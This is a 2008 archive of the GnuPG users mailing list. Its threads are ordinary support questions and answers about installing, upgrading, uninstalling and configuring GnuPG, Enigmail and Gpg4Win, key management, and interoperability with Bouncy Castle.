From kloecker at kde.org Sun Jun 1 00:10:39 2008
From: kloecker at kde.org (Ingo Klöcker)
Date: Sun, 01 Jun 2008 00:10:39 +0200
Subject: Enigmail...
In-Reply-To: <7ac5b3134e215b5a7f7c60d5b2866462@pboxmix.winstonsmith.info>
References: <7ac5b3134e215b5a7f7c60d5b2866462@pboxmix.winstonsmith.info>
Message-ID: <200806010010.39980@erwin.ingo-kloecker.de>

On Thursday 29 May 2008, Non scrivetemi wrote:
> > I just tried the plug-in Enigmail on Thunderbird, and it seems very
> > good.
>
> Enigmail is indeed quite brilliant. It's so good that once you've
> installed it you quickly yearn for a better mail client than
> Thunderbird, which is as bug-ridden a piece of rubbish as I've
> seen.

Do not despair. The Windows and Mac OS X ports of Kontact have just been
announced on LinuxTag. So very soon now there will be no excuse anymore
for using Thunderbird. ;-)

Press announcement of the German Federal Office for Information Security
(BSI) (sorry, German only):
http://www.bsi.bund.de/presse/pressinf/linuxtag210508.htm

Regards,
Ingo

From ahairape at mail.yerphi.am Mon Jun 2 10:35:35 2008
From: ahairape at mail.yerphi.am (Arsen Hayrapetyan)
Date: Mon, 2 Jun 2008 13:35:35 +0500 (AMST)
Subject: about GnuPG
In-Reply-To: <285591.78150.qm@web45503.mail.sp1.yahoo.com>
References: <285591.78150.qm@web45503.mail.sp1.yahoo.com>
Message-ID:

Hi Tigran!

> My name is Tigran and I have some issue ...
> On my system (Linux RH9 2.4.29) I'm using gpg (GnuPG) 1.2.1 with zlib-1.1.4-8.
> But when I'm trying to decrypt files which were encrypted with public and private keys it gets me this error message:
> ---------------------------------------------------------------------------
> gpg --decrypt-files /root/Test.xls.gpg
> gpg: encrypted with 2048-bit ELG-E key, ID 80224B85, created 2005-02-11
> "test1 "
> File `/root/Test.xls' exists. Overwrite (y/N)? y
> gpg: fatal: zlib inflate problem: invalid stored block lengths
> secmem usage: 2048/3104 bytes in 4/7 blocks of pool 4544/16384
> ---------------------------------------------------------------------------------------
> After this it creates a file Test.xls, but it has very small size and I can't open it 'cause it's damaged.
> I try to change my zlib with zlib 1.2.3 but it does not help. Then I changed version of GPG with GPG 1.4.9. But still I don't fix my issue. If you have any ideas please write me back ASAP.
>

I have searched in a couple of mailing lists and found out the following:

1)
http://217.69.76.57/pipermail/gnupg-users/2002-March/012433.html
http://217.69.76.57/pipermail/gnupg-users/2002-March/012442.html
http://217.69.76.57/pipermail/gnupg-users/2002-March/012434.html

2)
http://readlist.com/lists/gnupg.org/gnupg-users/0/3480.html
http://readlist.com/lists/gnupg.org/gnupg-users/0/3481.html
http://readlist.com/lists/gnupg.org/gnupg-users/0/3482.html
http://readlist.com/lists/gnupg.org/gnupg-users/0/3484.html

Personally, I've never encountered this problem, but maybe this helps
you to solve it...

Best regards,
Arsen.

From faramir.cl at gmail.com Mon Jun 2 12:48:27 2008
From: faramir.cl at gmail.com (Faramir)
Date: Mon, 02 Jun 2008 06:48:27 -0400
Subject: problem with forgotten passphrase, no revocation certificate available.
Message-ID: <4843CFFB.1060401@gmail.com>

Well, I made another key, for "playing" with it. Unfortunately, I
didn't make the revocation certificate that day. Now I was going to make
it and... surprise! wrong passphrase...
Well, I was not happy with this,
but since nobody would be using that key to write messages to me, I
thought I could just delete it... but on second thought, I searched it
in a key server... and the key was found.

So, here is the question: Can that public key cause problems, if I
associate another key with the same email account?

The only explanation I can think about is I forgot one of the
"mutations" of the passphrase, probably 2 characters, but that would
mean to test about 1000 different combinations, and I won't do that
manually. Is there any tool to automatise the process? The key is on my
private keyring, and I don't know how to extract it without knowing the
pass...

From mmlith at utu.fi Mon Jun 2 14:48:19 2008
From: mmlith at utu.fi (MastahYoda)
Date: Mon, 2 Jun 2008 05:48:19 -0700 (PDT)
Subject: Updating GnuPG to 1.4.9
Message-ID: <17600484.post@talk.nabble.com>

Hi there!

I'm running GnuPG on Windows and I would like to update my old GnuPG to
newer version, 1.4.9. How can I do it so, that I can still use my existing
keys? I tried quick-and-dirty method in my test machine and copy-pasted only
new exe-files to my old gnupg-folder. Obviously it didn't work, because I
couldn't find any keys when running --list-keys.. So does anyone know how to
update correctly? Thanks!

From laurent.jumet at skynet.be Tue Jun 3 10:29:25 2008
From: laurent.jumet at skynet.be (Laurent Jumet)
Date: Tue, 03 Jun 2008 10:29:25 +0200
Subject: Updating GnuPG to 1.4.9
In-Reply-To: <17600484.post@talk.nabble.com>
Message-ID:

Hello MastahYoda !

MastahYoda wrote:

> I'm running GnuPG on Windows and I would like to update my old GnuPG to
> newer version, 1.4.9. How can I do it so, that I can still use my existing
> keys? I tried quick-and-dirty method in my test machine and copy-pasted only
> new exe-files to my old gnupg-folder. Obviously it didn't work, because I
> couldn't find any keys when running --list-keys.. So does anyone know how to
> update correctly? Thanks!

Install GnuPG1.4.9 and by default, main program will be in C:\GnuPG
Copy your actual keyrings in C:\GnuPG\Keyrings
Additional plug-ins like IDEA.DLL are in C:\Lib\Gnupg

Pubring.gpg and Secring.gpg are the default names for GPG; may be your actual
keyrings are not in that format but look like .pgp .pkr .skr, so you only need to
import them once, to create the .gpg files.

--
Laurent Jumet
KeyID: 0xCFAF704C

From faramir.cl at gmail.com Tue Jun 3 13:48:49 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 03 Jun 2008 07:48:49 -0400
Subject: Updating GnuPG to 1.4.9
In-Reply-To:
References:
Message-ID: <48452FA1.8060800@gmail.com>

Laurent Jumet wrote:
> Hello MastahYoda !
>
> MastahYoda wrote:
>
>> I'm running GnuPG on Windows and I would like to update my old GnuPG to
>> newer version, 1.4.9. How can I do it so, that I can still use my existing
>> keys? I tried quick-and-dirty method in my test machine and copy-pasted only
>> new exe-files to my old gnupg-folder. Obviously it didn't work, because I
>> couldn't find any keys when running --list-keys..
>> So does anyone know how to
>> update correctly? Thanks!
>
> Install GnuPG1.4.9 and by default, main program will be in C:\GnuPG
> Copy your actual keyrings in C:\GnuPG\Keyrings
> Additional plug-ins like IDEA.DLL are in C:\Lib\Gnupg
>
> Pubring.gpg and Secring.gpg are the default names for GPG; may be your actual
> keyrings are not in that format but look like .pgp .pkr .skr, so you only need to
> import them once, to create the .gpg files.
>

I figure it is a good idea to export the private and public keyrings
before doing any change... I mean, upgrades are good things, but
sometimes can cause unexpected effects. With a backup, if everything
goes wrong, you can always reimport the keys.

From yalla at fsfe.org Tue Jun 3 14:15:37 2008
From: yalla at fsfe.org (Alexander W. Janssen)
Date: Tue, 03 Jun 2008 14:15:37 +0200
Subject: Updating GnuPG to 1.4.9
In-Reply-To: <48452FA1.8060800@gmail.com>
References: <48452FA1.8060800@gmail.com>
Message-ID: <484535E9.1050404@fsfe.org>

Faramir wrote:
> I figure it is a good idea to export the private and public keyrings
> before doing any change... I mean, upgrades are good things, but
> sometimes can cause unexpected effects. With a backup, if everything
> goes wrong, you can always reimport the keys.

I learned that the hard way yesterday... After my server-based
Windows-profile got deleted and created again, I imported secring.gpg
and pubring.gpg.
And after quite some effort I even got my smartcard
running again...

So I totally agree with you. Do a clean export so that you can import
everything again.

Famous last words: If "weird stuff" happens (like gpg.exe working, but
Enigmail refuses to see the keyring) check the registry-key
HKEY_CURRENT_USER\Software\GNU\gnupg for the string "HomeDir". I had to
make it point to the location where the actual keyring is (on a
USB-thumbdrive with a portable gpg...)

From wk at gnupg.org Tue Jun 3 17:22:38 2008
From: wk at gnupg.org (Werner Koch)
Date: Tue, 03 Jun 2008 17:22:38 +0200
Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407
In-Reply-To: (Eduardo Burkhard's message of "Tue, 3 Jun 2008 10:56:46 -0300")
References:
Message-ID: <87zlq2zgox.fsf@wheatstone.g10code.de>

Eduardo,

[It is unlikely that you can convince anyone to reply faster or to reply
at all if you resend your mails several times within a short period. In
particular cross-posting as well as including the webmaster(!) is not a
good idea.]

On Tue, 3 Jun 2008 15:56, ed.burkhard at ibest.com.br said:

> ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the
> folder, in which the program has been installed ("C:\...\GNU\...).

I already told you that the file is called gpg4win-uninstall but you
probably ran an uninstall already but terminated it prematurely.

> be insufficient memory, or that the .dll file could not be found. As a
> matter of fact, this "gpgol.dll" file is missing on my system.

Outlook usually disables non-working plugins automagically. If it did
not, go to the Outlook Extended Options menu to popup the Add-In Manager
and disable gpgol.

Salam-Shalom,

Werner

--
Thoughts are free. Exceptions are regulated by a federal law.

From ed.burkhard at ibest.com.br Tue Jun 3 15:56:46 2008
From: ed.burkhard at ibest.com.br (Eduardo Burkhard)
Date: Tue, 3 Jun 2008 10:56:46 -0300
Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407
Message-ID:

Hi there!

How should I proceed, in order to completely uninstall GNUPG / GPG4Win
(version 1.1.0.407) from my system, without leaving any tracks of it in the
Registry? I do not find anything at all of this program in the Control Panel
("Add/Remove Programs)". Neither do I find any "uninstall-file" in the
folder, in which the program has been installed ("C:\...\GNU\...).

My Operating System is Windows XP Professional SP2.

Remark: each time while opening Outlook (Brazilian-Portuguese version 2002
SP3), there always appears a warning screen, saying (translated now, from
Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not be
installed or loaded; furthermore, this warning message says that there could
be insufficient memory, or that the .dll file could not be found. As a
matter of fact, this "gpgol.dll" file is missing on my system.

So, does anyone know how to remove this program correctly? Thanks!

Eduardo Burkhard

From faramir.cl at gmail.com Tue Jun 3 19:09:52 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 03 Jun 2008 13:09:52 -0400
Subject: problem with forgotten passphrase, no revocation certificate available.
In-Reply-To: <4843CFFB.1060401@gmail.com>
References: <4843CFFB.1060401@gmail.com>
Message-ID: <48457AE0.7050705@gmail.com>

Faramir wrote:
> Well, I made another key, for "playing" with it. Unfortunately, I
> didn't make the revocation certificate that day. Now I was going to make
> it and... surprise! wrong passphrase... Well, I was not happy with this,
> but since nobody would be using that key to write messages to me, I
> thought I could just delete it... but on second thought, I searched it
> in a key server... and the key was found.
>
> So, here is the question: Can that public key cause problems, if I
> associate another key with the same email account?
>
> The only explanation I can think about is I forgot one of the
> "mutations" of the passphrase, probably 2 characters, but that would
> mean to test about 1000 different combinations, and I won't do that
> manually. Is there any tool to automatise the process? The key is on my
> private keyring, and I don't know how to extract it without knowing the
> pass...

I have good news (good for me at least): I checked the gpg installed in
my USB flash memory, and I found the private key (or at least, the
private subkeys for that key), and since I had not forgotten that
passphrase, I could revoke the key.

Anyway, I still would like to know the answers for these questions...

Regards

From faramir.cl at gmail.com Tue Jun 3 19:40:42 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 03 Jun 2008 13:40:42 -0400
Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407
In-Reply-To:
References:
Message-ID: <4845821A.2000902@gmail.com>

Eduardo Burkhard wrote:
> Hi there!
>
> How should I proceed, in order to completely uninstall GNUPG / GPG4Win
> (version 1.1.0.407) from my system, without leaving any tracks of it in the
> Registry? I do not find anything at all of this program in the Control Panel
> ("Add/Remove Programs)".
> Neither do I find any "uninstall-file" in the
> folder, in which the program has been installed ("C:\...\GNU\...).
>
> My Operating System is Windows XP Professional SP2.
>
> Remark: each time while opening Outlook (Brazilian-Portuguese version 2002
> SP3), there always appears a warning screen, saying (translated now, from
> Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not be
> installed or loaded; furthermore, this warning message says that there could
> be insufficient memory, or that the .dll file could not be found. As a
> matter of fact, this "gpgol.dll" file is missing on my system.
>
> So, does anyone know how to remove this program correctly? Thanks!

Maybe you should try something to remove unused entries from the
registry... like CCleaner. It is free. But make a backup, before doing
changes... I am not so sure how much control it provides...

From tobias.weisserth at gmail.com Tue Jun 3 18:41:49 2008
From: tobias.weisserth at gmail.com (Tobias Weisserth)
Date: Tue, 3 Jun 2008 18:41:49 +0200
Subject: SCM SPR532 & Ubuntu 8.04 & GnuPG 1.4.6 versus GnuPG 2.0.7
In-Reply-To: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com>
References: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com>
Message-ID: <43cee7130806030941x552d9c6i67166432954ce4f0@mail.gmail.com>

!PING!

I am just following up on this to get a reaction.
Any ideas, tutorials or pointers for GnuPG SmartCard use with a pin pad
card reader like the SCM SPR532? I didn't make any progress by myself.
I really need help here.

Thanks,
Tobias W.

From jmoore3rd at bellsouth.net Tue Jun 3 21:10:03 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Tue, 03 Jun 2008 15:10:03 -0400
Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407
In-Reply-To: <4845821A.2000902@gmail.com>
References: <4845821A.2000902@gmail.com>
Message-ID: <4845970B.4060205@bellsouth.net>

Faramir wrote:
> Eduardo Burkhard wrote:
>> How should I proceed, in order to completely uninstall GNUPG / GPG4Win
>> (version 1.1.0.407) from my system
>> My Operating System is Windows XP Professional SP2.
>> So, does anyone know how to remove this program correctly? Thanks!
>
> Maybe you should try something to remove unused entries from the
> registry... like CCleaner. It is free. But make a backup, before doing
> changes... I am not so sure how much control it provides...

For 'detailed' cleaning of the Registry in Windows _without_ having to
use RegEdit and manually search I recommend the Free App RegCleaner.exe
which may be located via a Web Search. This App will offer You the
ability to specifically target/seek Registry entries using Your Search
term(s). Be sure and select the Back-Up option prior to deleting!

JOHN ;)
Timestamp: Tuesday 03 Jun 2008, 15:09 --400 (Eastern Daylight Time)

From gukgukcommunity at yahoo.com Wed Jun 4 06:45:54 2008
From: gukgukcommunity at yahoo.com (guk guk)
Date: Tue, 3 Jun 2008 21:45:54 -0700 (PDT)
Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0
Message-ID: <521129.96578.qm@web46014.mail.sp1.yahoo.com>

Hi !

I tried to automate decryption of pgp files by running this command line
in windows xp

gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV" --decrypt "OUTPUT.CSV.pgp"

or

gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV" --decrypt "OUTPUT.CSV.pgp"

but it always fails. It always throws an error

gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08
gpg: public key decryption failed: bad passphrase
gpg: decryption failed: secret key not available

I'm using gnupg 1.4.9. Can anybody help me please?

Thanks

From bhushan1988 at gmail.com Wed Jun 4 11:00:09 2008
From: bhushan1988 at gmail.com (Bhushan Jain)
Date: Wed, 4 Jun 2008 10:00:09 +0100
Subject: Incompatibility between GnuPG encryption and the Bouncy Castle encryption.
Message-ID: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com>

Hi,

I have created RSA key as well as its subkey for encryption using GnuPG.
Now I encrypted a file using JAVA library functions given by Bouncy Castle
(a pgp library in JAVA which claims to adhere to rfc 2440). I also
encrypted the same file using the GnuPG commands from command line. The
following are the results of the pgpdump for both of them...........

PGPdump for GnuPG:------

PGPdump Results

Old: Public-Key Encrypted Session Key Packet(tag 1)(140 bytes)
    New version(3)
    Key ID - 0xB84434E8A6EACCA8
    Pub alg - RSA Encrypt or Sign(pub 1)
    RSA m^e mod n(1024 bits) - 88 74 a9 7c bb 85 c6 1d 19 82 55
        ec 72 86 93 4d 74 52 94 a4 c1 e7 9f bd b9 9d 8c 82 da 08 d1 db 71 09 4f
        de 40 77 16 95 7f 52 14 11 23 c0 61 68 61 eb 43 c7 80 ac 6b 36 df 65 99
        e7 f8 14 78 1f d7 3f 18 41 10 aa 5e df 59 a2 eb 49 39 c2 d6 4a a8 be 07
        fe 9a ae 7b 95 2e 90 e1 30 3f 47 9c bb 96 f1 1d 17 9b 6b 6c a6 5b 4d 57
        f0 fa de 6b c9 51 aa 36 e6 81 87 3d c0 ff c6 b6 5b 8c 66 6d 1f
        -> m = sym alg(1 byte) + checksum(2 bytes) + PKCS-1 block type 02
New: Symmetrically Encrypted and MDC Packet(tag 18)(168 bytes)
    Ver 1
    Encrypted data [sym alg is specified in pub-key encrypted session key]
        (plain text + MDC SHA1(20 bytes))

PGPdump for BouncyCastle:--------------

PGPdump Results

Old: Public-Key Encrypted Session Key Packet(tag 1)(140 bytes)
    New version(3)
    Key ID - 0xB84434E8A6EACCA8
    Pub alg - RSA Encrypt or Sign(pub 1)
    RSA m^e mod n(1024 bits) - af db e9 49 ce f1 f5 d5 c1 ab a3
        59 39 f2 a6 6e 05 2f 99 9d 79 87 cf 19 3a 9f ad 15 da 8d 83 ee a9 36 72
        c3 23 42 33 70 2f 40 69 03 2f 9c 18 44 bb 20 b2 5c 5e 09 fd ad c4 16 61
        39 07 a1 a7 ab 1d 0c 06 69 d5 81 8d 2c 65 ae 89 b6 db 5d e0 5e 4d 6e d8
        ae 7b f1 3b f1 52 a3 52 24 a0 55 2c 43 47 66 cd 92 a1 3e c5 c2 38 4c 02
        5d e6 59 bf b3 6d 09 a0 9b cc 63 46 ec 7a cf f6 7f 62 f9 1a 86
        -> m = sym alg(1 byte) + checksum(2 bytes) + PKCS-1 block type 02
New: Symmetrically Encrypted and MDC Packet(tag 18)(155 bytes)
    Ver 1
    Encrypted data [sym alg is specified in pub-key encrypted session key]
        (plain text + MDC SHA1(20 bytes))

I am also attaching the encrypted files......

When I use GnuPG to decrypt the file encrypted using Bouncy Castle
Libraries, the file gets decrypted correctly. But if I use Bouncy Castle
to decrypt the file encrypted using GnuPG, I get an exception stating
illegal key size. The following is the stacktrace for the program.

org.bouncycastle.openpgp.PGPException: Exception starting decryption
java.security.InvalidKeyException: *Illegal key size *
    at javax.crypto.Cipher.a(Unknown Source)
    at javax.crypto.Cipher.init(Unknown Source)
    at javax.crypto.Cipher.init(Unknown Source)
    at org.bouncycastle.openpgp.PGPPublicKeyEncryptedData.getDataStream(Unknown Source)
    at org.bouncycastle.openpgp.PGPPublicKeyEncryptedData.getDataStream(Unknown Source)
    at bouncyCastlePGP.BcDecrypt.decrypt_bc(BcDecrypt.java:130)

The statement giving exception is supposed to give a decrypted stream
using the secret key. But the same decryption program using Bouncy Castle
decrypts correctly the file encrypted using Bouncy Castle libraries.

The only difference I could observe in the dumps of both the files is the
packet size of New packet(tag 18).(Highlighted) Can that make a
difference?

Plz help me ..... or is it that GnuPG does not follow the rfc2440??

Thanks,
------------------
Bhushan.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: encrypted_using_GnuPG.txt.gpg
Type: application/octet-stream
Size: 527 bytes
Desc: not available
-------------- next part --------------
A non-text attachment was scrubbed...
Name: encrypted_using_BouncyCastle.txt.gpg
Type: application/octet-stream
Size: 499 bytes
Desc: not available

From phil-gpg at tinsleyviaduct.com Wed Jun 4 17:13:00 2008
From: phil-gpg at tinsleyviaduct.com (Phil Reynolds)
Date: Wed, 04 Jun 2008 16:13:00 +0100
Subject: Wildcards in uids?
Message-ID: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com>

I have recently started using suffixed e-mail addresses and am wondering
if I might need to add suffixes I am using to my key - or if I can add
something that would catch them all.

If I need to add them individually, it may be better to add the ones I
need to as I need them, but if a catch-all is possible, please advise me
as to how I need to specify it.

--
Phil Reynolds  o ____  mail: phil-gpg at tinsleyviaduct.com
               |L_ \ / Web: http://www.tinsleyviaduct.com/phil/
              (_)- \/  Waltham 66, Emley Moor 69, Droitwich 79, Windows 95

From carloswill at gmail.com Wed Jun 4 18:02:30 2008
From: carloswill at gmail.com (Carlos Williams)
Date: Wed, 4 Jun 2008 12:02:30 -0400
Subject: Am I Missing Something?
In-Reply-To: <483EFB33.1080607@bellsouth.net>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net>
Message-ID:

On Thu, May 29, 2008 at 2:51 PM, John W. Moore III wrote:
>
> Make certain that on the 'OpenPGP' > 'Preferences' > 1st Tab that the
> Path to gpg.exe is correct.

I am not using Windows so I can't say for sure about *.exe. I am using
Linux and Mozilla Thunderbird.

I uninstalled and reinstalled Enigmail on my Mozilla Thunderbird just
to make sure the "plugin" worked properly.

I then looked at my keys generated on my system:

cwilliams at tunafish:~/.gnupg$ gpg --list-keys
/home/cwilliams/.gnupg/pubring.gpg
----------------------------------
pub 1024D/C4B187CB 2008-05-29
uid Carlos Williams
sub 8446g/6B90B444 2008-05-29

***I don't know if I should be publicly posting the info above...Is
that bad to show in public?***

Anyways - Enigmail does not find my key. I installed the most recent
version on my Linux / Thunderbird system...

I am fairly lost on why this is not working for me...any suggestions?

From dshaw at jabberwocky.com Wed Jun 4 19:08:40 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Wed, 4 Jun 2008 13:08:40 -0400
Subject: Wildcards in uids?
In-Reply-To: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com>
References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com>
Message-ID: <20080604170840.GB5992@jabberwocky.com>

On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote:
>
> I have recently started using suffixed e-mail addresses and am wondering
> if I might need to add suffixes I am using to my key - or if I can add
> something that would catch them all.
>
> If I need to add them individually, it may be better to add the ones I
> need to as I need them, but if a catch-all is possible, please advise me
> as to how I need to specify it.

Sorry, there is no way within GnuPG to do such a thing. It's
frequently doable outside of GnuPG via your mail program, but you'd
have to consult the documentation for that program to learn how.

David

From aongenae at gmail.com Wed Jun 4 20:09:38 2008
From: aongenae at gmail.com (Arnaud Ongenae)
Date: Wed, 4 Jun 2008 20:09:38 +0200
Subject: Am I Missing Something?
In-Reply-To:
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net>
Message-ID: <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com>

On Wed, Jun 4, 2008 at 6:02 PM, Carlos Williams wrote:
> On Thu, May 29, 2008 at 2:51 PM, John W. Moore III
> wrote:
>>
>> Make certain that on the 'OpenPGP' > 'Preferences' > 1st Tab that the
>> Path to gpg.exe is correct.
>
> I am not using Windows so I can't say for sure about *.exe. I am using
> Linux and Mozilla Thunderbird.

On Linux it's /usr/bin/gpg (or /usr/bin/gpg2)

>
> I uninstalled and reinstalled Enigmail on my Mozilla Thunderbird just
> to make sure the "plugin" worked properly.
>
> I then looked at my keys generated on my system:
>
> cwilliams at tunafish:~/.gnupg$ gpg --list-keys
> /home/cwilliams/.gnupg/pubring.gpg
> ----------------------------------
> pub 1024D/C4B187CB 2008-05-29
> uid Carlos Williams
> sub 8446g/6B90B444 2008-05-29
>
> ***I don't know if I should be publicly posting the info above...Is
> that bad to show in public?***

This is not confidential information

>
> Anyways - Enigmail does not find my key. I installed the most recent
> version on my Linux / Thunderbird system...
>
> I am fairly lost on why this is not working for me...any suggestions?
>

Do you see my signature (or from other person on this list) in
Thunderbird ???

_-Arnaud-_

From aongenae at gmail.com Wed Jun 4 20:25:38 2008
From: aongenae at gmail.com (Arnaud Ongenae)
Date: Wed, 4 Jun 2008 20:25:38 +0200
Subject: Am I Missing Something?
In-Reply-To:
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com>
Message-ID: <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com>

You may give a try to FireGPG (an extension to Firefox) that allows you
to use gpg in the Gmail interface... it's really easy
http://getfiregpg.org/index.php?page=home&lang=en

It will show if the mails are signed even if your mail is not
configured for gpg, so you will be able to see if gpg is well configured,
then we can try to find out another solution

_-Arnaud-_

On Wed, Jun 4, 2008 at 8:20 PM, Carlos Williams wrote:
> On Wed, Jun 4, 2008 at 2:09 PM, Arnaud Ongenae wrote:
>
>> Do you see my signature (or from other person on this list) in Thunderbird ???
>
> I am not using this email on Mozilla Thunderbird. I am strictly using
> the web mail aspect of Gmail on this account. I am testing this out on
> a separate account.
>

From phil-gpg at tinsleyviaduct.com Wed Jun 4 20:23:00 2008
From: phil-gpg at tinsleyviaduct.com (Phil Reynolds)
Date: Wed, 4 Jun 2008 19:23:00 +0100
Subject: Wildcards in uids?
In-Reply-To: <20080604170840.GB5992@jabberwocky.com>
References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com>
Message-ID: <20080604182300.GA8245@tinsleyviaduct.com>

On Wed, Jun 04, 2008 at 01:08:40PM -0400, David Shaw wrote:
> On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote:
> >
> > I have recently started using suffixed e-mail addresses and am wondering
> > if I might need to add suffixes I am using to my key - or if I can add
> > something that would catch them all.
> >
> > If I need to add them individually, it may be better to add the ones I
> > need to as I need them, but if a catch-all is possible, please advise me
> > as to how I need to specify it.
>
> Sorry, there is no way within GnuPG to do such a thing. It's
> frequently doable outside of GnuPG via your mail program, but you'd
> have to consult the documentation for that program to learn how.

I think you may have misunderstood the query.

I use suffixed e-mail addresses - I introduced them to help me sort mail
as well as spot the leaky organisations. That part is absolutely
working.

However, do I need to add these addresses as uids to my key if I wish to
sign or encrypt mail where I am using them as From: addresses?

Is a "catch all suffixes" uid possible if that is the case? If so, how do
I specify it? It is nothing, as far as I can see, to do with my mail
programs (either of them). It is more to do with key administration.

If not, presumably I simply sign/decrypt using my existing key?

--
Phil Reynolds  o ____  mail: phil-gpg at tinsleyviaduct.com
               |L_ \ / Web: http://www.tinsleyviaduct.com/phil/
              (_)- \/  Waltham 66, Emley Moor 69, Droitwich 79, Windows 95

From dshaw at jabberwocky.com Wed Jun 4 21:18:00 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Wed, 4 Jun 2008 15:18:00 -0400
Subject: Wildcards in uids?
In-Reply-To: <20080604182300.GA8245@tinsleyviaduct.com>
References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com>
Message-ID: <20080604191800.GC5992@jabberwocky.com>

On Wed, Jun 04, 2008 at 07:23:00PM +0100, Phil Reynolds wrote:
> On Wed, Jun 04, 2008 at 01:08:40PM -0400, David Shaw wrote:
> > On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote:
> > >
> > > I have recently started using suffixed e-mail addresses and am wondering
> > > if I might need to add suffixes I am using to my key - or if I can add
> > > something that would catch them all.
> > >
> > > If I need to add them individually, it may be better to add the ones I
> > > need to as I need them, but if a catch-all is possible, please advise me
> > > as to how I need to specify it.
> >
> > Sorry, there is no way within GnuPG to do such a thing. It's
> > frequently doable outside of GnuPG via your mail program, but you'd
> > have to consult the documentation for that program to learn how.
>
> I think you may have misunderstood the query.
>
> I use suffixed e-mail addresses - I introduced them to help me sort mail
> as well as spot the leaky organisations. That part is absolutely
> working.
>
> However, do I need to add these addresses as uids to my key if I wish to
> sign or encrypt mail where I am using them as
From: addresses?
>
> Is a "catch all suffixes" uid possible if that is the case? If so, how do
> I specify it? It is nothing, as far as I can see, to do with my mail
> programs (either of them). It is more to do with key administration.

I think I did understand the query. You have email addresses like
"myaddress-foo at example.com", "myaddress-bar at example.com", and so on.
The question was is a "catch all suffixes" UID possible. The answer
to that question is no.

That said, I'm not sure why you think this is a necessary thing to
do.

David

From faramir.cl at gmail.com Wed Jun 4 21:58:49 2008
From: faramir.cl at gmail.com (Faramir)
Date: Wed, 04 Jun 2008 15:58:49 -0400
Subject: Incompatibility between GnuPG encryption and the Bouncy Castle encryption.
In-Reply-To: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com>
References: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com>
Message-ID: <4846F3F9.8040608@gmail.com>

Bhushan Jain wrote:
> Hi,
>
> I have created RSA key as well as its subkey for encryption using GnuPG.
> Now I encrypted a file using JAVA library functions given by Bouncy
> Castle (a pgp library in JAVA which claims to adhere to rfc 2440). I
> also encrypted the same file using the GnuPG commands from command line.
> The following are the results of the pgpdump for both of them...........
...
> Plz help me .....
> or is it that GnuPG do not follow the rfc2440??

All I know about this is GnuPG can be set to different compatibility modes, like: openpgp, pgp2, pgp8, rfc1991, rfc2440, rfc4880, and some others.

Reading GnuPG manual, it states:

"INTEROPERABILITY

GnuPG tries to be a very flexible implementation of the OpenPGP standard. In particular, GnuPG implements many of the optional parts of the standard, such as the SHA-512 hash, and the ZLIB and BZIP2 compression algorithms. It is important to be aware that not all OpenPGP programs implement these optional algorithms and that by forcing their use via the --cipher-algo, --digest-algo, --cert-digest-algo, or --compress-algo options in GnuPG, it is possible to create a perfectly valid OpenPGP message, but one that cannot be read by the intended recipient.

There are dozens of variations of OpenPGP programs available, and each supports a slightly different subset of these optional algorithms. For example, until recently, no (unhacked) version of PGP supported the BLOWFISH cipher algorithm. A message using BLOWFISH simply could not be read by a PGP user.
By default, GnuPG uses the standard OpenPGP preferences system that will always do the right thing and create messages that are usable by all recipients, regardless of which OpenPGP program they use. Only override this safe default if you really know what you are doing.

If you absolutely must override the safe default, or if the preferences on a given key are invalid for some reason, you are far better off using the --pgp6, --pgp7, or --pgp8 options. These options are safe as they do not force any particular algorithms in violation of OpenPGP, but rather reduce the available algorithms to a "PGP-safe" list."

So, maybe the cipher algorithm you are using with GnuPG is not supported in rfc2440, and the solution would be to change the preferences settings to rfc2440 compatible.

I hope this helps.

Regards

From carloswill at gmail.com Thu Jun 5 00:12:25 2008
From: carloswill at gmail.com (Carlos Williams)
Date: Wed, 04 Jun 2008 18:12:25 -0400
Subject: Am I Missing Something?
In-Reply-To: <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com>
References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com>
